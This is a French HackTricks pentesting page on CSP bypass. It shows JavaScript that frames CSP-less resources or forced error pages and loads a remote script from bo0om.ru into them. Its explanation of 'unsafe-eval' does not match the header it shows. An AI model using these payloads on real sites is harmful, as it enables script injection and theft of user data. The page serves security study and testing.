mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-02 17:41:04 +00:00
86 lines
5.6 KiB
Markdown
86 lines
5.6 KiB
Markdown
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
- Travaillez-vous dans une entreprise de **cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
|
||
|
||
- Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
||
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
||
- **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
|
||
- **Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||
|
||
</details>
|
||
```
|
||
Content-Security-Policy: default-src ‘self’ ‘unsafe-inline’;
|
||
```
|
||
Interdit l'utilisation de toute fonction qui exécute du code transmis sous forme de chaîne. Par exemple: `eval, setTimeout, setInterval` seront tous bloqués en raison du paramètre `unsafe-eval`.
|
||
|
||
Tout contenu provenant de sources externes est également bloqué, y compris les images, CSS, WebSockets et, surtout, JS.
|
||
|
||
## Via texte et images
|
||
|
||
Les navigateurs modernes transforment les images et les textes en fichiers HTML pour mieux les visualiser (définir le fond, centrer, etc.).
|
||
|
||
Par conséquent, si vous **ouvrez une image ou un fichier texte** tel que **favicon.ico** ou **robots.txt** avec un **`iframe`**, vous l'ouvrirez en tant qu'HTML.
|
||
|
||
**Ces types de pages n'ont généralement pas d'en-têtes CSP et pourraient ne pas avoir de X-Frame-Options**, vous pouvez donc exécuter du JS arbitraire à partir d'eux:
|
||
```javascript
|
||
frame=document.createElement("iframe");
|
||
frame.src="/css/bootstrap.min.css";
|
||
document.body.appendChild(frame);
|
||
script=document.createElement('script');
|
||
script.src='//bo0om.ru/csp.js';
|
||
window.frames[0].document.head.appendChild(script);
|
||
```
|
||
## Via les erreurs
|
||
|
||
Tout comme les fichiers texte ou les images, **les réponses d'erreur n'ont généralement pas d'en-têtes CSP et pourraient ne pas avoir de X-Frame-Options**. Ainsi, vous pouvez forcer des erreurs et les charger à l'intérieur d'un iframe :
|
||
```javascript
|
||
// Force nginx error
|
||
frame=document.createElement("iframe");
|
||
frame.src="/%2e%2e%2f";
|
||
document.body.appendChild(frame);
|
||
|
||
// Force error via long URL
|
||
frame=document.createElement("iframe");
|
||
frame.src="/"+"A".repeat(20000);
|
||
document.body.appendChild(frame);
|
||
|
||
// Force error via long cookies
|
||
for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};
|
||
frame=document.createElement("iframe");
|
||
frame.src="/";
|
||
document.body.appendChild(frame);
|
||
// Don't forget to remove them
|
||
for(var i=0;i<5;i++){document.cookie=i+"="}
|
||
```
|
||
|
||
```javascript
|
||
// After any of the previous examples, you can execute JS in the iframe with something like:
|
||
script=document.createElement('script');
|
||
script.src='//bo0om.ru/csp.js';
|
||
window.frames[0].document.head.appendChild(script);
|
||
```
|
||
## Références
|
||
|
||
* [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)
|
||
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
- Travaillez-vous dans une entreprise de **cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
|
||
|
||
- Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
||
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
||
- **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
|
||
- **Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||
|
||
</details>
|